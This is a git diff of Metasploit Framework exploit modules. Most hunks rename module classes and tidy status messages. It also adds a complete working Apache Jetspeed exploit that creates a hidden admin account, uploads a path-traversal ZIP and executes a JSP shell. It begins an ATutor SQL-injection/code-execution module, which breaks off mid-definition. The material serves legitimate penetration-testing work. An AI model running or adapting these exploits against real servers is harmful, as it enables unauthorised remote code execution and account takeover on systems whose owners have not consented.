Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_exec.rb b/modules/exploits/multi/browser/java_jre17_exec.rb index 9280d870ad..b3a797e075 100644 --- a/modules/exploits/multi/browser/java_jre17_exec.rb +++ b/modules/exploits/multi/browser/java_jre17_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb index 7c37c553a2..e0545f2e52 100644 --- a/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb +++ b/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jaxws.rb b/modules/exploits/multi/browser/java_jre17_jaxws.rb index 4dfad212b6..5333aced38 100644 --- a/modules/exploits/multi/browser/java_jre17_jaxws.rb +++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb index 597c3fdf2f..ce12144e5f 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb index 906d07867f..1902a0eb83 100644 --- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb +++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_method_handle.rb b/modules/exploits/multi/browser/java_jre17_method_handle.rb index 32f55c5613..1bbea0f9c8 100644 --- a/modules/exploits/multi/browser/java_jre17_method_handle.rb +++ b/modules/exploits/multi/browser/java_jre17_method_handle.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb index 9e4931f342..32da73a192 100644 --- a/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb +++ b/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_jre17_reflection_types.rb b/modules/exploits/multi/browser/java_jre17_reflection_types.rb index 9fa97d5e57..b3852a2629 100644 --- a/modules/exploits/multi/browser/java_jre17_reflection_types.rb +++ b/modules/exploits/multi/browser/java_jre17_reflection_types.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rhino.rb b/modules/exploits/multi/browser/java_rhino.rb index c752549994..5577bb5818 100644 --- a/modules/exploits/multi/browser/java_rhino.rb +++ b/modules/exploits/multi/browser/java_rhino.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_rmi_connection_impl.rb b/modules/exploits/multi/browser/java_rmi_connection_impl.rb index 41a3705785..5ae6062ed0 100644 --- a/modules/exploits/multi/browser/java_rmi_connection_impl.rb +++ b/modules/exploits/multi/browser/java_rmi_connection_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_setdifficm_bof.rb b/modules/exploits/multi/browser/java_setdifficm_bof.rb index 46be8c7c58..290c212685 100644 --- a/modules/exploits/multi/browser/java_setdifficm_bof.rb +++ b/modules/exploits/multi/browser/java_setdifficm_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 82bc228e50..5ebe7bd273 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_storeimagearray.rb b/modules/exploits/multi/browser/java_storeimagearray.rb index cab28b512a..68fb323109 100644 --- a/modules/exploits/multi/browser/java_storeimagearray.rb +++ b/modules/exploits/multi/browser/java_storeimagearray.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_trusted_chain.rb b/modules/exploits/multi/browser/java_trusted_chain.rb index e2f4651f3e..fb54d99100 100644 --- a/modules/exploits/multi/browser/java_trusted_chain.rb +++ b/modules/exploits/multi/browser/java_trusted_chain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/java_verifier_field_access.rb b/modules/exploits/multi/browser/java_verifier_field_access.rb index dbe08a3035..644ecbf818 100644 --- a/modules/exploits/multi/browser/java_verifier_field_access.rb +++ b/modules/exploits/multi/browser/java_verifier_field_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index b01bba4436..a0781321ae 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/mozilla_navigatorjava.rb b/modules/exploits/multi/browser/mozilla_navigatorjava.rb index bf763ea14d..e2b148f5c9 100644 --- a/modules/exploits/multi/browser/mozilla_navigatorjava.rb +++ b/modules/exploits/multi/browser/mozilla_navigatorjava.rb @@ -6,7 +6,7 @@ require 'msf/core/constants' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/opera_configoverwrite.rb b/modules/exploits/multi/browser/opera_configoverwrite.rb index 0e426d005b..74045adbdd 100644 --- a/modules/exploits/multi/browser/opera_configoverwrite.rb +++ b/modules/exploits/multi/browser/opera_configoverwrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index 470e2f1eb5..e04ac98519 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index 5a1e3c5e1b..e23c60c516 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index d6fb488e75..726953c360 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -65,30 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java...") + print_status("Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}'") + print_good("Remote OS is '#{result}'") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Discovering TEMP path") + print_status("Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}'") + print_good("TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else @@ -102,18 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'System.getProperty("java.class.path")' - vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...") + vprint_status("Trying to execute 'System.getProperty(\"java.version\")'...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - No results for the Java test") + vprint_status("No results for the Java test") return false elsif result =~ /elasticsearch/ - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return true else - vprint_status("#{peer} - Answer to Java test: #{result}") + vprint_status("Answer to Java test: #{result}") return false end end diff --git a/modules/exploits/multi/elasticsearch/search_groovy_script.rb b/modules/exploits/multi/elasticsearch/search_groovy_script.rb index a513909f8a..68a45dd24f 100644 --- a/modules/exploits/multi/elasticsearch/search_groovy_script.rb +++ b/modules/exploits/multi/elasticsearch/search_groovy_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper @@ -63,27 +63,27 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking vulnerability...") + print_status("Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Discovering TEMP path...") + print_status("Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path on '#{tmp_dir}'") + print_good("TEMP path on '#{tmp_dir}'") end - print_status("#{peer} - Discovering remote OS...") + print_status("Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - Remote OS is '#{os}'") + print_good("Remote OS is '#{os}'") end if os =~ /win/i @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(tmp_file) - print_status("#{peer} - Trying to load metasploit payload...") + print_status("Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end @@ -102,12 +102,12 @@ class Metasploit3 < Msf::Exploit::Remote def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' - vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") + vprint_status("Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? - vprint_status("#{peer} - no response to test") + vprint_status("no response to test") return false elsif result == 'class java.lang.Runtime' return true @@ -118,12 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote def parse_result(res) unless res - vprint_error("#{peer} - No response") + vprint_error("No response") return nil end unless res.code == 200 && res.body - vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") + vprint_error("Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index fc668215fb..2aa31da111 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb index 1e15976eb4..13f70050be 100644 --- a/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb +++ b/modules/exploits/multi/fileformat/js_unpacker_eval_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 96e8152bf5..bc14a88c60 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb index 3b72a6101e..920ca81f2c 100644 --- a/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb +++ b/modules/exploits/multi/fileformat/nodejs_js_yaml_load_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 8fe12bb9d3..7c92f18163 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb index 171b689dbb..baf8345adb 100644 --- a/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb +++ b/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index 3a910ece59..a9d22c9429 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/multi/gdb/gdb_server_exec.rb b/modules/exploits/multi/gdb/gdb_server_exec.rb index 9d501c7793..9f4f0f63a4 100644 --- a/modules/exploits/multi/gdb/gdb_server_exec.rb +++ b/modules/exploits/multi/gdb/gdb_server_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Gdb diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 47840b548e..5054756e07 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index d8f6182078..c7e6129b76 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index eae0dc278f..bc94a338b3 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_status("#{peer} - The server returned: #{res.code} #{res.message}") + print_status("The server returned: #{res.code} #{res.message}") m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || '' if m.empty? - print_error("#{peer} - This server may not be vulnerable") + print_error("This server may not be vulnerable") else - print_status("#{peer} - Command output from the server:") + print_status("Command output from the server:") print_line(m) end end diff --git a/modules/exploits/multi/http/apache_jetspeed_file_upload.rb b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb new file mode 100644 index 0000000000..7f6f27ded4 --- /dev/null +++ b/modules/exploits/multi/http/apache_jetspeed_file_upload.rb @@ -0,0 +1,226 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = ManualRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apache Jetspeed Arbitrary File Upload', + 'Description' => %q{ + This module exploits the unsecured User Manager REST API and a ZIP file + path traversal in Apache Jetspeed-2, versions 2.3.0 and unknown earlier + versions, to upload and execute a shell. + + Note: this exploit will create, use, and then delete a new admin user. + + Warning: in testing, exploiting the file upload clobbered the web + interface beyond repair. No workaround has been found yet. Use this + module at your own risk. No check will be implemented. + }, + 'Author' => [ + 'Andreas Lindh', # Vulnerability discovery + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2016-0710'], + ['CVE', '2016-0709'], + ['URL', 'http://haxx.ml/post/140552592371/remote-code-execution-in-apache-jetspeed-230-and'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0709'], + ['URL', 'https://portals.apache.org/jetspeed-2/security-reports.html#CVE-2016-0710'] + ], + 'DisclosureDate' => 'Mar 6 2016', + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'win'], + 'Arch' => ARCH_JAVA, + 'Privileged' => false, + 'Targets' => [ + ['Apache Jetspeed <= 2.3.0 (Linux)', 'Platform' => 'linux'], + ['Apache Jetspeed <= 2.3.0 (Windows)', 'Platform' => 'win'] + ], + 'DefaultTarget' => 0 + )) + + register_options([ + Opt::RPORT(8080) + ]) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_warning(msg='') + super("#{peer} - #{msg}") + end + + def exploit + print_status("Creating admin user: #{username}:#{password}") + create_admin_user + # This was originally a typo... but we're having so much fun! + print_status('Kenny Loggins in') + kenny_loggins + print_warning('You have entered the Danger Zone') + print_status("Uploading payload ZIP: #{zip_filename}") + upload_payload_zip + print_status("Executing JSP shell: /jetspeed/#{jsp_filename}") + exec_jsp_shell + end + + def cleanup + print_status("Deleting user: #{username}") + delete_user + super + end + + # + # Exploit methods + # + + def create_admin_user + send_request_cgi( + 'method' => 'POST', + 'uri' => '/jetspeed/services/usermanager/users', + 'vars_post' => { + 'name' => username, + 'password' => password, + 'password_confirm' => password + } + ) + send_request_cgi( + 'method' => 'POST', + 'uri' => "/jetspeed/services/usermanager/users/#{username}", + 'vars_post' => { + 'user_enabled' => 'true', + 'roles' => 'admin' + } + ) + end + + def kenny_loggins + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/login/redirector' + ) + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => '/jetspeed/login/j_security_check', + 'cookie' => res.get_cookies, + 'vars_post' => { + 'j_username' => username, + 'j_password' => password + } + ) + + @cookie = res.get_cookies + end + + # Let's pretend we're mechanize + def import_file + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/jetspeed/portal/Administrative/site.psml', + 'cookie' => @cookie + ) + + html = res.get_html_document + import_export = html.at('//a[*//text() = "Import/Export"]/@href') + + res = send_request_cgi!( + 'method' => 'POST', + 'uri' => import_export, + 'cookie' => @cookie + ) + + html = res.get_html_document + html.at('//form[*//text() = "Import File"]/@action') + end + + def upload_payload_zip + zip = Rex::Zip::Archive.new + zip.add_file("../../webapps/jetspeed/#{jsp_filename}", payload.encoded) + + mime = Rex::MIME::Message.new + mime.add_part(zip.pack, 'application/zip', 'binary', + %Q{form-data; name="fileInput"; filename="#{zip_filename}"}) + mime.add_part('on', nil, nil, 'form-data; name="copyIdsOnImport"') + mime.add_part('Import', nil, nil, 'form-data; name="uploadFile"') + + case target['Platform'] + when 'linux' + register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}") + register_files_for_cleanup("../temp/#{username}/#{zip_filename}") + when 'win' + register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}") + register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}") + end + + send_request_cgi( + 'method' => 'POST', + 'uri' => import_file, + 'ctype' => "multipart/form-data; boundary=#{mime.bound}", + 'cookie' => @cookie, + 'data' => mime.to_s + ) + end + + def exec_jsp_shell + send_request_cgi( + 'method' => 'GET', + 'uri' => "/jetspeed/#{jsp_filename}", + 'cookie' => @cookie + ) + end + + # + # Cleanup methods + # + + def delete_user + send_request_cgi( + 'method' => 'DELETE', + 'uri' => "/jetspeed/services/usermanager/users/#{username}" + ) + end + + # XXX: This is a hack because FileDropper doesn't delete directories + def on_new_session(session) + super + case target['Platform'] + when 'linux' + print_status("Deleting user temp directory: ../temp/#{username}") + session.shell_command_token("rm -rf ../temp/#{username}") + when 'win' + print_status("Deleting user temp directory: ..\\temp\\#{username}") + session.shell_command_token("rd /s /q ..\\temp\\#{username}") + end + end + + # + # Utility methods + # + + def username + @username ||= Rex::Text.rand_text_alpha_lower(8) + end + + def password + @password ||= Rex::Text.rand_text_alphanumeric(8) + end + + def jsp_filename + @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp' + end + + def zip_filename + @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' + end + +end diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb index d5bd15e7ba..9be7e7fffd 100644 --- a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb +++ b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/apache_roller_ognl_injection.rb b/modules/exploits/multi/http/apache_roller_ognl_injection.rb index 7c34f04663..67afb643ef 100644 --- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb +++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -87,8 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote append = 'false' jar = payload.encoded_jar.pack - File.open("/tmp/#{@payload_exe}", "wb") do |f| f.write(jar) end - chunk_length = 384 # 512 bytes when base64 encoded parts = jar.chars.each_slice(chunk_length).map(&:join) diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 6b2f6d616e..0ca04d25f8 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--o0oOo0o\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), @@ -96,11 +96,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end end diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb new file mode 100644 index 0000000000..693c045c1c --- /dev/null +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -0,0 +1,272 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ATutor 2.2.1 SQL Injection / Remote Code Execution', + 'Description' => %q{ + This module exploits a SQL Injection vulnerability and an authentication weakness + vulnerability in ATutor. This essentially means an attacker can bypass authentication + and reach the administrator's interface where they can upload malicious code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me <steventhomasseeley[at]gmail.com>', # initial discovery, msf code + ], + 'References' => + [ + [ 'CVE', '2016-2555' ], + [ 'URL', 'http://www.atutor.ca/' ], # Official Website + [ 'URL', 'http://sourceincite.com/research/src-2016-08/' ] # Advisory + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of Atutor', '/ATutor/']) + ],self.class) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def 